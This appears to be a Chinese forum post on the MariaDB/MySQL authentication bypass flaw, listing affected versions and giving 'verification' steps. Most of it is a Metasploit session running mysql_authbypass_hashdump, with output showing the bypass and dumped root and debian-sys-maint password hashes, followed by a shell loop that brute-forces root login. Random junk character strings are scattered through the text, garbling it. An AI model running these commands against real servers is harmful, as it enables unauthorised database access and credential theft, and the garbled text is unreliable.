当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。
$ U$ {/ P$ q/ N( |% D) ]' F9 V, t7 E6 A7 x$ w
也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现。* I8 x; w. v0 P4 M# J5 V0 }5 c
% t! ]/ T# M7 u" W/ m1 p7 Y1 u6 D
受影响的产品:$ L& M, n2 b3 Y) G7 q1 |
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are/ v- F0 \$ \) z, }. c+ [4 v
vulnerable.
- b1 L# f, Y6 }- T+ D) a2 LMariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.3 l8 P) h b) T- E2 `, X$ v
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not. ^: G" X- _8 T8 k; W$ C" p
3 B& o" Y; ^( w$ c; T; ?验证方法:
0 x* j( g0 G0 |6 }2 B* n9 I
/ t, a4 K& E! S- l" b$ msfconsole msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1 msf auxiliary(mysql_authbypass_hashdump) > run [+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test [*] 127.0.0.1:3306 Authentication bypass is 10% complete [*] 127.0.0.1:3306 Authentication bypass is 20% complete [*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts [+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes… [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89 [*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed( f, C, l0 ^' X/ i5 }, k
! x% F, h, w' q $ for i in `seq 1 1000`; do mysql -u root –password=bad -h 127.0.0.1 2>/dev/null; done mysql>! ?- J7 ^: ~' B4 c& }
|